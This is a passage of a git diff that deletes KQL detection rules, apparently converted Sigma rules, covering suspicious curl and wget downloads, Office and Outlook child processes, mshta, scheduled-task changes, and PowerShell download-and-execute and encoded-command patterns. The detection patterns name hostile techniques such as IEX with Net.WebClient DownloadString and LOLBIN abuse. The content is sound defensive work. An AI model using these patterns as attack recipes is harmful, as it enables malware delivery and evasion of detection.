endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") \ No newline at end of file diff --git a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql b/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql deleted file mode 100644 index bdaf9ef9..00000000 --- a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: high -// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") \ No newline at end of file diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql b/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql deleted file mode 100644 index e3c7add6..00000000 --- a/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/27 -// Level: high -// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql b/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql deleted file mode 100644 index 4a82ac5a..00000000 --- a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/27 -// Level: high -// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql b/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql deleted file mode 100644 index b0c196f8..00000000 --- a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/23 -// Level: high -// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) \ No newline at end of file diff --git a/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql b/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql deleted file mode 100644 index b434440a..00000000 --- a/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2022/09/01 -// Level: high -// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE") \ No newline at end of file diff --git a/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql b/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql deleted file mode 100644 index 3dac4b9b..00000000 --- a/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022/12/15 -// Level: high -// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%")) \ No newline at end of file diff --git a/Execution/Suspicious_HH.EXE_Execution.kql b/Execution/Suspicious_HH.EXE_Execution.kql deleted file mode 100644 index cd21df94..00000000 --- a/Execution/Suspicious_HH.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxim Pavlunin -// Date: 2020/04/01 -// Level: high -// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe) -// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/Execution/Suspicious_HWP_Sub_Processes.kql b/Execution/Suspicious_HWP_Sub_Processes.kql deleted file mode 100644 index 7c00588f..00000000 --- a/Execution/Suspicious_HWP_Sub_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/10/24 -// Level: high -// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation -// Tags: attack.initial_access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032 -DeviceProcessEvents -| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe" \ No newline at end of file diff --git a/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql b/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql deleted file mode 100644 index 54c067e6..00000000 --- a/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/12/07 -// Level: high -// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context -// Tags: attack.execution, attack.t1059.001 -DeviceFileEvents -| where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive") \ No newline at end of file diff --git a/Execution/Suspicious_LOLBIN_AccCheckConsole.kql b/Execution/Suspicious_LOLBIN_AccCheckConsole.kql deleted file mode 100644 index 83a2f028..00000000 --- a/Execution/Suspicious_LOLBIN_AccCheckConsole.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/06 -// Level: high -// Description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains " -window " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe") \ No newline at end of file diff --git a/Execution/Suspicious_Microsoft_Office_Child_Process.kql b/Execution/Suspicious_Microsoft_Office_Child_Process.kql deleted file mode 100644 index 255e5e51..00000000 --- a/Execution/Suspicious_Microsoft_Office_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io -// Date: 2018/04/06 -// Level: high -// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) -// Tags: attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) \ No newline at end of file diff --git a/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql b/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql deleted file mode 100644 index 37f7d4d5..00000000 --- a/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/28 -// Level: high -// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location -Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on -Instead they modify the task after creation to include their malicious payload - -// Tags: attack.execution, attack.t1053.005 -DeviceProcessEvents -| where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") \ No newline at end of file diff --git a/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql b/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql deleted file mode 100644 index 796ce58d..00000000 --- a/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/07/17 -// Level: high -// Description: Detects suspicious mshta process execution patterns -// Tags: attack.execution, attack.t1106 -DeviceProcessEvents -| where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta"))))) \ No newline at end of file diff --git a/Execution/Suspicious_Outlook_Child_Process.kql b/Execution/Suspicious_Outlook_Child_Process.kql deleted file mode 100644 index 7dd75aaa..00000000 --- a/Execution/Suspicious_Outlook_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team -// Date: 2022/02/28 -// Level: high -// Description: Detects a suspicious process spawning from an Outlook process. -// Tags: attack.execution, attack.t1204.002 -DeviceProcessEvents -| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE" \ No newline at end of file diff --git a/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql deleted file mode 100644 index 504899dd..00000000 --- a/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/14 -// Level: high -// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state -// Tags: attack.execution, attack.persistence, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql b/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql deleted file mode 100644 index 047e80a5..00000000 --- a/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/28 -// Level: high -// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile(" \ No newline at end of file diff --git a/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql b/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql deleted file mode 100644 index 787c878f..00000000 --- a/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/05/24 -// Level: high -// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe"))) \ No newline at end of file diff --git a/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql b/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql deleted file mode 100644 index 54d656c3..00000000 --- a/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/03/24 -// Level: high -// Description: Detects suspicious ways to run Invoke-Execution using IEX alias -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where 